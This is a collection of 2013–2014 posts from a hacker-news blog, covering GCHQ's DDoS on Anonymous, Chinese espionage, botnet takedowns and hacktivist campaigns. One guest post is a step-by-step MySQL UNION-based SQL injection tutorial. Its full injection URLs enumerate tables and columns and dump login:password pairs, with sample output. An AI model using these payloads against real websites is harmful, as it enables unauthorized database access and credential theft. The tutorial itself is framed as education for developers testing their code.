British Spy Agency GCHQ Performed DDoS Attack Against Anonymous -Snowden Documents Transpired

British Spy Agency GCHQ Performed DDoS Attack Against Hacktivist Anonymous & LulzSec -Snowden Documents Transpired

While excavating the past, it was always found that cyber criminals, large hacker collective groups were the culprits for engaging voluminous denial of service attack. But this widely transfusing story get a one eighty degree reverse turn, when the former NSA contractor Edward Snowden revealed another trade secret. Recently a lurid story get spot lighted, as the whistle blower Snowden unfold yet another breathtaking stealthy  documents taken from the National Security Agency. The clandestine documents taken the mask from the so called good guys, unveiling British spy agency GCHQ had launched a secret war against the infamous hacktivist collective Anonymous and a splinter group known as LulzSec several years ago. Many of you guessed right, this was happened when Anonymous were targeting various UK companies and government websites. The documents disclose that GCHQ carried out seemingly illegal DDoS attacks against the collective, flooding their chatrooms with so much traffic that they would become inaccessible – and all with the approval of the British government. The revelations come less than a year after several LulzSec activists were jailed by a British court for carrying out similar DDoS attacks against targets including the CIA, the UK’s Serious Organized Crime Agency (SOCA), News International, Sony and the Westboro Baptist Church, among others. 

This sensational issue was made public by NBC News deferentially with the help of none other than Edward Snowden. In their exclusive report headed 'War on Anonymous: British Spies Attacked Hackers,' NBC said -The blunt instrument the spy unit used to target hackers, however, also interrupted the web communications of political dissidents who did not engage in any illegal hacking. It may also have shut down websites with no connection to Anonymous. According to the documents, a division of Government Communications Headquarters (GCHQ), the British counterpart of the NSA, shut down communications among Anonymous hacktivists by launching a “denial of service” (DDOS) attack – the same technique hackers use to take down bank, retail and government websites – making the British government the first Western government known to have conducted such an attack.

The documents, from a PowerPoint presentation prepared for a 2012 NSA conference called SIGDEV, show that the unit known as the Joint Threat Research Intelligence Group, or JTRIG, boasted of using the DDOS attack – which it dubbed Rolling Thunder -- and other techniques to scare away 80 percent of the users of Anonymous internet chat rooms. 

The existence of JTRIG has never been previously disclosed publicly. The documents also show that JTRIG infiltrated chat rooms known as IRCs and identified individual hackers who had taken confidential information from websites. In one case JTRIG helped send a hacktivist to prison for stealing data from PayPal, and in another it helped identify hacktivists who attacked government websites. 

As soon as this story getting all the spot lights, immediately the GCHQ responded to this saying all their movements and operations were lawful. “All of GCHQ’s work is carried out in accordance with a strict legal and policy framework which ensure[s] that our activities are authorized, necessary and proportionate, and that there is rigorous oversight, including from the Secretary of State, the Interception and Intelligence Services Commissioners and the Parliamentary Intelligence and Security Committee. All of our operational processes rigorously support this position.” -GCHQ said the press. To know more detail about this story, don't forget to stay tuned with VOGH. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">British Spy Agency GCHQ Performed DDoS Attack Against Anonymous -Snowden Documents Transpired"https://www.voiceofgreyhat.com/2014/02/gchq-ddos-hacktivist-anonymous.html</a>

Chinese Hackers Eavesdropping European Diplomats Before G20 Summit

Researchers At FireEye Found -Chinese Hackers Snitching  Europeans Before G20 Summit 

Story of cyber espionage by Chinese hackers used to remain one of most highest pick of breakneck. Yet again another breathtaking issue of  eavesdropping by Chinese hackers get spot light, when  California-based renounced computer security firm FireEye Inc have figured out that a group of Chinese hackers eavesdropped on the computers of five European foreign ministries before last September's G20 Summit, which was dominated by the Syrian crisis. From the detailed analysis we came to know that the hackers have infiltrated the ministries' computer networks by sending emails to staff containing tainted files with titles such as "US_military_options_in_Syria," which sells virus fighting technology to companies. Whenever the targeted recipients opened those documents, they loaded malicious code on to their personal computers. Researchers of FireEye said that they were able to monitor the "inner workings" of the main computer server used by the hackers to conduct their reconnaissance and move across compromised systems for about a week in the late August. But suddenly they lost access to the hackers after they moved to another server shortly before the G20 Summit in St. Petersburg, Russia. 

Though the company has declined in open press to identify the nations whose ministries were hacked, although it said they were all members of the European Union. But FireEye informed the FBI about the whole issue in details. FireEye also confirmed that the hackers where from China, but they did not find evidence which may link those hackers to the Chinese government. Not surprisingly and obviously like earlier the Chinese government has distanced itself from any claim that it might have hacked foreign governments for data. FireEye also successfully monitor several dozen hacking groups operating in China, most of which they suspect of having ties to the government. The firms also suspect the hacking groups of stealing intellectual property for commercial gain. The researchers had been following the hackers behind the Syria-related attack for several years, but this is the first time the group's activities have been publicly documented. The company calls the group "Ke3chang," after the name of one of the files it uses in one of its pieces of malicious software. "The theme of the attacks was U.S. military intervention in Syria," said FireEye researcher Nart Villeneuv. 

On reaction Chinese Foreign Ministry spokesman Hong Lei said- "U.S. internet companies are keen on hyping up the so-called hacker threat from China, but they never obtain irrefutable proof, and what so-called evidence they do get is widely doubted by experts. This is neither professional nor responsible," 

While talking in this story of Chinese eavesdropping, I also want to dig some points from decent parts where we all became very habituated of seeing Europe & U.S. countries blaming China for engaging cyber attacks; and China also do the same for accusing U.S. like vice versa. I am reviving your memories of last few years where If you look at the story of major cyber attacks of this year we will find that the name of China has been involved several times for engaging cyber attacks against several high profile websites and organization of U.S. including New York Times, Twitter, NBC and so on. And if you refresh our memory then then we will find the scenario of big cyber attack and espionage by Chinese hackers have been spotted several times. In 2012 Chinese hackers had  breached Telvent's corporate network & gained control of US Power Grid. Also in the middle of last year, we have seen that Chinese hackers have broken into Indian Navy's Computer System & stolen sensitive data. Few months before this hack, Tokyo based computer security firm Trend Micro confirmed that Chinese hackers were responsible for biggest cyber-espionage in India, Japan & Tibet. Also the director of National Security Agency (NSA) General Keith Alexander confirmed that hackers from China was responsible for the serious attack on one of the leading IT security & cyber security company RSA. Also in 2011 China was responsible behind the attack on US Chamber of Commerce, Satellite System of U.S, Nortel Network & so on.  But few days ago National Computer Network Emergency Response Coordination Center of China (CNCERT/CC), China's primary computer security monitoring network claimed that China fallen victim of one of biggest cyber attacks originated from US, Japan & South Korea. We must have to say that this statement is truly irrelevant. Cyber crime investigator have found that China was directly responsible for the hack into Japan's Biggest Defense Contractor Mitsubishi, Japan Aerospace Exploration Agency (JAXA) & Parliament of Japan. In case of South Korea  more than 13 Million of MapleStory players data has been stolen, there also hackers from China was responsible.  

Before I conclude, I request you to closely look at the above mentioned stories, you will find China majorly responsible for eavesdropping & security breach. On the same side China also been effected by the same way. So in conclusion, we cant put a full stop in this chain of cyber attacks, hacking & eavesdropping, as it comes from both end. So this exciting episode will be continued like it does. If you want to stay updated then don't forget to stay tuned with VOGH. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Chinese Hackers Eavesdropping European Diplomats Before G20 Summit "https://www.voiceofgreyhat.com/2013/12/china-eavesdropping-europeans-before-G20-summit.html</a>

Microsoft Along With FBI & EC3 Shattered The Notorious ZeroAccess Botnet

Microsoft Along With FBI & EC3 Shattered The Notorious ZeroAccess Botnet Responsible For Infecting More Than 2 Million Computers

Redmond based software giant Microsoft yet again got a huge success against a big racket of cyber criminals while shattering one of the world's largest and most rampant botnets named 'ZeroAccess'. The Sirefef botnet, also known as ZeroAccess, is responsible for infecting more than 2 million computers, specifically targeting search results on Google, Bing and Yahoo search engines, and is estimated to cost online advertisers $2.7 million each month. Tech giant Microsoft working alongside the Federal Bureau of Investigation (FBI), Europol's European Cybercrime Centre (EC3) have successfully disrupted this notorious botnet. This is Microsoft’s first botnet action since the Nov. 14 unveiling of its new Cybercrime Center — a center of excellence for advancing the global fight against cyber crime — and marks the company’s eighth botnet operation in the past three years.

“This operation marks an important step in coordinated actions that are initiated by private companies and, at the same time, enable law enforcement agencies around Europe to identify and investigate the criminal organizations and networks behind these dangerous botnets that use malicious software to gain illicit profits,” said Troels Oerting, head of the EC3. “EC3 added its expertise, information communications technology infrastructure and analytic capability, as well as provided the platform for high-level cooperation between cyber crime units in five European countries and Microsoft.”

Due to its botnet architecture, ZeroAccess is one of the most robust and durable botnets in operation today and was built to be resilient to disruption efforts, relying on a peer-to-peer infrastructure that allows cyber criminals to remotely control the botnet from tens of thousands of different computers. ZeroAccess is used to commit a slew of crimes, including search hijacking, which “hijacks” people’s search results and redirects people to sites they had not intended or requested to go to in order to steal the money generated by their ad clicks. ZeroAccess also commits click fraud, which occurs when advertisers pay for clicks that are not the result of legitimate, interested human users’ clicks, but are the result of automated Web traffic and other criminal activity. Research by the University of California, San Diego shows that as of October 2013, 1.9 million computers were infected with ZeroAccess, and Microsoft determined there were more than 800,000 ZeroAccess-infected computers active on the Internet on any given day.

How It Happened:- 

Last week, Microsoft filed a civil suit against the cyber criminals operating the ZeroAccess botnet and received authorization from the U.S. District Court for the Western District of Texas to simultaneously block incoming and outgoing communications between computers located in the U.S. and the 18 identified Internet Protocol (IP) addresses being used to commit the fraudulent schemes. In addition, Microsoft took over control of 49 domains associated with the ZeroAccess botnet. A10 Networks provided Microsoft with advanced technology to support the disruptive action.

As Microsoft executed the order filed in its civil case, Europol coordinated a multijurisdictional criminal action targeting the 18 IP addresses located in Europe. Specifically, Europol worked with Latvia, Luxembourg, Switzerland, the Netherlands and Germany to execute search warrants and seizures on computer servers associated with the fraudulent IP addresses located in Europe. This is the second time in six months that Microsoft and law enforcement have worked together to successfully disrupt a prevalent botnet. It demonstrates the value coordinated operations have against cyber criminal enterprises. For more information about this botnet operation click here

ZeroAccess is counted as a very sophisticated malware, blocking attempts to remove it, therefore recommended for every Microsoft user to click Here for detailed instructions on how to remove this threat. As Microsoft found that the ZeroAccess malware disables security features on infected computers, leaving the computer susceptible to secondary infections, it is critical that victims rid their computers of ZeroAccess by using malware removal or antivirus software as quickly as possible. 

In conversation with press David Finn, executive director and associate general counsel of the Microsoft Digital Crimes Unit said -“Microsoft is committed to working collaboratively — with our customers, partners, academic experts and law enforcement — to combat cybercrime. And we’ll do everything we can to protect computer users from the sinister activities and criminal networks that victimize innocent people and businesses around the world.” 

While talking about ZeroAccess botnet take down, I would like to remind you that in Match, last year Microsoft has successfully shutdown two command and control (C&C) server of world's of the most dangerous banking trojan Zeus.

-Source (Microsoft Official Blog)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Microsoft Along With FBI & EC3 Shattered The Notorious ZeroAccess Botnet"https://www.voiceofgreyhat.com/2013/12/microsoft-shattered-zerozccess-botnet.html</a>

We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)

We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article made by Mr. Rafael Souza one of the great admirer and fan of VOGH has gladly shared his brilliant research paper on SQL-Injection (MySql) with us. Rafael is a very passionate on cyber security domain and he is keenly involved with GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time lets go and see what Rafael has for us:- 

Discover The Infamous MySQL Injection Technique 

                                                                                        

ABSTRACT:

It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?

There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.

                                                                                                       
Understand the technique MySQL Injection: 

One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application. 

STEP BY STEP

 

(Figure 1) Detecting

Searching Column number (s): We will test earlier in error, then no error may be said to find.

(Figure 2) SQL Error 

Host Information,

Version of MySQL system used on the server.

(Figure 3) Host Information

(Figure 4) Location of the Files

Current database connection used between the "input" to the MySQL system

(Figure 5) Users of MySQL

(Figure 6) Current Time

Brute Force or Shooting

This happens in versions below 5.x.y

(Figure 7) Testing

Dump: This happens in versions up 5.x.y [ 1º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--

usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--

CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--

COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--

usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--

rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table

* Brute Force / Shooting

This happens in versions below 5.x.y

http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--

Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--

Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--

_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--

rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=

Dump

This happens in versions up 5.x.y [ 1º Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--

login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--

login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--

passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--

id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--

texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Extracting data from the columns of a given table

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--

_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--

_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--

_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=

Concat
group_concat() => Search all you want with ascii caracters

concat() => search what you want with ascii caracters

concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.

It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researcher and developers to beware and test your code.

CONCLUSION

Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?

The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.

The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.

**********

I hope you all will enjoy the above article, as I did. On behalf of entire VOGH Team I am sincerely thanking Mr. Rafael Souza for his remarkable contribution. 

To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)"https://www.voiceofgreyhat.com/2013/12/we-are-best-tool-for-web-application.html</a>

#OpKillingBay- Anonymous Threaten to Engage Cyber Attack Against Japan Govt Over Dolphin Hunt

#OpKillingBay- Anonymous Threaten to Engage Cyber Attack Against Japan Govt Over Dolphin Hunt

I am sure that many of you remember the famous Oscar winning documentary 'The Cove' where the atrocious practice of killing Dolphins have been highlighted. Now it seems that the internet activist have pick that issue very seriously as the world's largest community of international hackers and activist, widely known as Anonymous has rises his voice against a gruesome culture of Dolphin hunting in Japan. The Japanese government has received an online threat from dangerous hacker collective group Anonymous where they vows to engage massive cyber attack against Japan government if they did not stop this cruel practice of killing the rare spices of dolphin near Taiji, Wakayama Prefecture. According to Japanese officials, they have received this bullying message from Anonymous “STOP these slaughters IMMEDIATELY, or get ready to face the extent of our wrath.” In a pastebin release the hacker group has declared 22 high profile Japanese websites on their hit list, including those of the prime minister’s office, Taji, Wakayama Prefecture, the Ministry of Agriculture, Forestry and Fisheries, and the Ministry of Internal Affairs and Communications.

While following their consuetude, Anonymous has called this campaign Operation KillingBay dubbed #OpKillingBay, where the hacker promised to engage massive cyber attack, in order to damage the Japanese Cyber space. The government has taken this threat very seriously, while looking at the past history of Anonymous and their capabilities, Taiji government and the National Information Security Center have been sent immediate alert since the warning from Anonymous been received. To gain public attention on this very matter the internet activist has already started a project named Save Japan Dolphins, now this contribution of Anonymous will definitely enhance this protest. For updates on this story and also all the other cyber updates stay tuned with VOGH. 

-Source (JDP)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">#OpKillingBay- Anonymous Threaten to Engage Cyber Attack Against Japan Govt Over Dolphin Hunt"https://www.voiceofgreyhat.com/2013/11/OpKillingBay-anonymous-threaten-japan-dolphin-hunt.html</a>

Linux/Cdorked.A: One of The Most Sophisticated Apache Backdoor Targets Millions of Websites

Linux/Cdorked.A: One of The Most Sophisticated Apache Backdoor Targets Millions of Websites to Serve Blackhole Exploit

ESET one of the world renowned security firm headquartered in Bratislava have figured out what it called a malicious cyber rampage targeting millions of cPanel-based servers. Since last few months security experts have been tracking server level compromises that have been utilizing malicious Apache modules to inject malware into websites and  redirecting some of its requests to the infamous Blackhole Exploit packs. On cPanel-based servers, instead of adding modules or modifying the Apache configuration, the attackers started to replace the Apache binary (httpd) with a malicious one. This new backdoor is very sophisticated and this new malware has been dubbed "Linux/Cdorked.A." Several analysis reveals that it is a sophisticated and stealthy backdoor meant to drive traffic to malicious websites. According to the official blog post of ESET - Linux/Cdorked.A is one of the most sophisticated Apache backdoor's we have seen so far. The backdoor leaves no traces of compromised hosts on the hard drive other than its modified httpd binary, thereby complicating forensics analysis. All of the information related to the backdoor is stored in shared memory. The configuration is pushed by the attacker through obfuscated HTTP requests that aren't logged in normal Apache logs. This means that no command and control information is stored anywhere on the system.

This malicious cyber rampage was first detected by another security firm named 'Sucuri' and later ESET published a detailed analysis of the issue. But still there are thoughtful matter as already thousands of websites get infected. The attack is particularly dangerous as Apache web servers are among the most well-known and widely-used in the world and are used by numerous companies. This means that a successful security breach can affect numerous different businesses across a diverse range of industries.

As this malware also known as Linux/Cdorked.A has already been spotted in the wild, so on behalf of cyber media, we urge all the concern system administrator, security analyst to take care of the above issue while to checking their servers and verify that they are not affected by this threat. Detailed instructions to perform this check are provided in the ESET blog.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Linux/Cdorked.A: One of The Most Sophisticated Apache Backdoor Targets Millions of Websites "https://www.voiceofgreyhat.com/2013/05/Linux-Cdorked.A-Sophisticated-Apache-Backdoor.html</a>

Oxford University Will Get £1 Million of Investment in Next 2 Year to Tackle Cyber Crime

Oxford University Will Get £1 Million of Investment in Next 2 Year to Tackle Cyber Crime

The rising amount of cyber crime has already put the world of security under a serious threat. Since last five years we have seen many devastating cyber attack which have broken almost every security measure. In short, today the entire cyber space is posing a serious risk. To get rid of this situation many developed countries have already started taking required counter measure. Cyber awareness program, campaigns are going in almost every part of the world. Such steps and countermeasures were mainly limited to government and corporate, but now as we are sitting at the edge of cyber threat, so the security system should be more enhanced. While looking at the current status OXFORD University have came forward, and they are going to open a cyber hub to tackle these ongoing cyber challenges. Acceding to the official website of Oxford Mail - OXFORD University will get £1 million of investment in the next two years to fund a center to tackle cyber crime. Funding for the Government’s Global Center for Cyber Security Capacity Building has been announced by Foreign Secretary William Hague, who pledged £500,000 a year for at least the next two years. It will be based at the home of the Oxford Martin School, with the aim of combating activists and terrorists who are posing a growing threat to our national security and economy.

The school’s director, Ian Goldin, Oxford University Professor of Globalisation and Development, said: “The whole purpose is to address critical challenges of the future. The international scale of the challenge requires new research and connections with the business world, which is part of the school’s mandate.” The centre will be based at the Old Indian Institute, a former university library building, on the corner of Broad Street and Catte Street, which is currently being refurbished. Prof Goldin, whose new book Divided Nations explores the risks brought about by rapid globalization and technological leaps like the internet, said keeping up with criminals will be far from easy. He said: “We are in a race, or struggle, between people who want to keep systems safe and secure and those who – for whatever reasons that may be commercial, nationalist or anarchical – want to undermine the system. That won’t end. 

According to some legitimate sources it has been confirmed that the new center will be a beacon of expertise and put the UK at the forefront of cyber policy development. It will operate from Broad Street from September. The two-year funding will help pay for an additional 12 specialists. Sadie Creese will head the new center as professor of cyber security.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Oxford University Will Get £1 Million of Investment in Next 2 Year to Tackle Cyber Crime"https://www.voiceofgreyhat.com/2013/05/OxfordUniversity-Will-Get-1M-to-Tackle-Cybercrime.html</a>

#OpIsrael Continues: KHS & MLA Hacked Several Israeli Govt Websites & Leaked Sensitive Data

Muslim Liberation Army (MLA) & Kosova Hacker Security (KHS) Joins Operation Isreal & Hacked Several Israeli Govt Websites & Leaked Sensitive Data

Operation Israel the devastating hacking rampage continues and becoming more and more venturesome for the Israeli cyber space. In the last week of March, it was dangerous hacker collective group Anonymous who called the operation also dubbed #OpIsrael, where the hacker group vows to erase Israel from the Internet. And as expected this is happening, the first quake came from Turkey-based Marxist hacker group named RedHack and Anonymous, where they targeted Israeli intelligence agency Mossad and breached personal data of 35K officials. Operation Israel, was not among those typical rampage of Anonymous, here Anon called other hackers from different part of of the spectrum to join. First it was RedHack who responded, and now the Muslim Liberation Army lead by Pakistani hacker Hitcher, along with Kosova Hacker's Security & few other Albanian hacker's community joined #OpIsrael. 

Yesterday it was Hitcher from Muslim Liberation Army (MLA) who targeted Israel’s Ministry of National Infrastructures (MNI). The hacker managed to breach the server of Israel Ministry and defaced several website belongs to Israel Ministry of Infrastructures. The attack took place at yesterday late night, but still at the time of writing the news, several Israel MNI websites are not performing. Not only MNI, as per sources several other high profile and Israeli government sites have also been taken down in this round attack. While covering this hack of Hitcher, we must have to recap the previous hack of  Pakistan hackers who are constantly against Israel (for Gaza issue) causing massive cyber attack against leading IT industry of Israel and other high profile Israeli sites. Just a couple of months ago, the world seen what it call the black day in the history if Israeli cyber space where another Pak hackers community hacked the main domain controller of Israel, which causes a massive hack against almost all the big Israeli sites such as government, MSN, Bing, Live, Skype, Microsoft Store, BBC, CNN, Coca-Colla, XBOX, Windows, Intel & many more. 

During the hacking rampage, Hitcher delivered the following message - 

“We are outraged at the Palestine present condition and the Illegal occupation of Palestinian Land By the Zionist Israelis. This attack is in response to the Injustice against the Palestinian people. Occupied Palestinian land under the guise of residential settlements are being increased. Palestinians are deprived of their basic human rights. International Aid workers are stopped from providing any humanitarian assistance to the people. The International community and media is not allowed to bring facts to world as due to strict restrictions” 

On the other hand, Kosova Hacker's Security along with few other Albanian hacker's community performed, what it called a demolishing cyber attack, that caused huge damage to the Israeli cyber space. During the attack Kosova Hacker's Security also known as KHS hit several important Israeli government & commercial websites such as  Civil Aviation Authority, Israel Police, Ministry of Health and many more. KHS caused damage to those websites, not by doing defacement by causing data leak. KHS hacked and exposed thousands of sensitive data, including full name, email-id, passwords and other confidential information of those said Israeli websites. All those leaked data have been made available by the hackers in a website called pentagoncrew.com All those hacks have been performed under the banner of Operation Israel also dubbed #OpIsrael for the cause of Gaza. For instance, here we can recap the hack of Kosova Hackers Security (KHS) where they hacked and exposed personal data of 35,000 Israeli people. 

At conclusion, we want to say that, at the time when Anonymous first called Operation Israel, Israeli government presumed that they have taken the threat very seriously and from the government end it has been  stated that they will take almost every steps to avoid any kind of disaster. Now after observing the above scenario it is clear that Israel Government have completely failed to protect their cyber space, in spite of having precaution. Also another thing get spot light, that is different hackers community have already came under a single shade in order to hit Israel against Gaza & Palestine issue. Today is the historical 7th April, I mean the day which Anonymous promised to erase Israel from the Internet. So the clock is running, lets see what more is about to come.  for the time stay tuned with VOGH to get all the latest update on this story and also other cyber issues. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">#OpIsrael Continues: KHS & MLA Hacked Several Israeli Govt Websites & Leaked Sensitive Data"https://www.voiceofgreyhat.com/2013/04/OpIsrael-Continues-KHS-MLA-Hacked-Israeli-Sites.html</a>

(#OpFreeKorea) Anonymous Breached Uriminzokkiri, Stolen 15k User Data & Hijacked Twitter, Flickr Account

Anonymous Breached Uriminzokkiri.com, Stolen 15K User Data & Hijacked Twitter, Flickr Account (#OpFreeKorea)

Anonymous the most organized and infamous hacktivist group of the world have targeted the cyber fence of North Korea, and the hacking campaign started with the hack of propaganda site Uriminzokkiri.com. The attack had been executed in different steps, first the hacker group calling them selves 'Anonymous Korea' managed to gain access inside Uriminzokkiri and claimed to have stolen more than 15,000 user data (including the names, email addresses, passwords and dates of birth & many more) and later they defaced the website. Uriminzokkiri's main site was offline till Thursday morning. Not only the data breach and defacement, Anonymous affiliated hackers continued their chariots of cyber attack, which then hit the official twitter and Flickr account belongs to Uriminzokkiri. Both the twitter feed and flickr photos have been replaced by the hacker group with anti-North Korea messages. In their message Anonymous boldly demanded that Kim Jong-Un resign and installs free democracy in North Korea while saying Kim Jong as "threatening world peace." Meanwhile Uriminzokkiri's official Twitter account picture had been changed to show two mask-wearing dancers, alongside the legend "Tango Down" and links to hacked companion sites as follows: Hacked uriminzokkiri.com, uriminzokkiri.com/itv, ryugyongclip.com

Notably the hackers posted a cartoon wanted poster of Kim Jong Un – "aka Nuke Nuke Mickey Lover" – with a list of his alleged crimes, including "threatening world peace with ICBMs and nuclear weapons," "wasting money while his people starve to death," and "concentration camps and the worst human rights violation in the world."

The entire cyber attack was done under the banner of Operation Free Korea also dubbed #OpFreeKorea. Hackers from Anonymous vows the North Korean government while claiming to have access to the country’s local intranets, mail servers and web servers. Anonymous hackers claimed to have taken five of the country’s websites offline over the weekend. "We are inside your local intranets, we are inside your mail servers, we are inside your web servers." said the twitter feed of Anonymous Korea. From one of the relevant source of Anonymous it is confirmed that the next activity for the Anonymous #OpFreeKorea campaign is slated as happening on April 19. 

#OpFreeKorea Press Release of Anonymous:-

Hello, citizens of the world.
We are Anonymous
North Korean government is increasingly becoming a threat to peace and freedom.
Don't misunderstand us: As well we disagree with the USA government too - these guys are crooks,
USA is a threat to world peace too, and direct democracy (or any kind of democracy) doesn't exist
there. The American government is a target and enemy of Anonymous as well!
This is not about country vs country - This is about we, the people, the 99% (of USA and of North
Korea) vs oppressing and violent regimes (like USA gov. and N.K. gov)!
We, the people, are gathering together because we are stronger now and we won't fight your wars
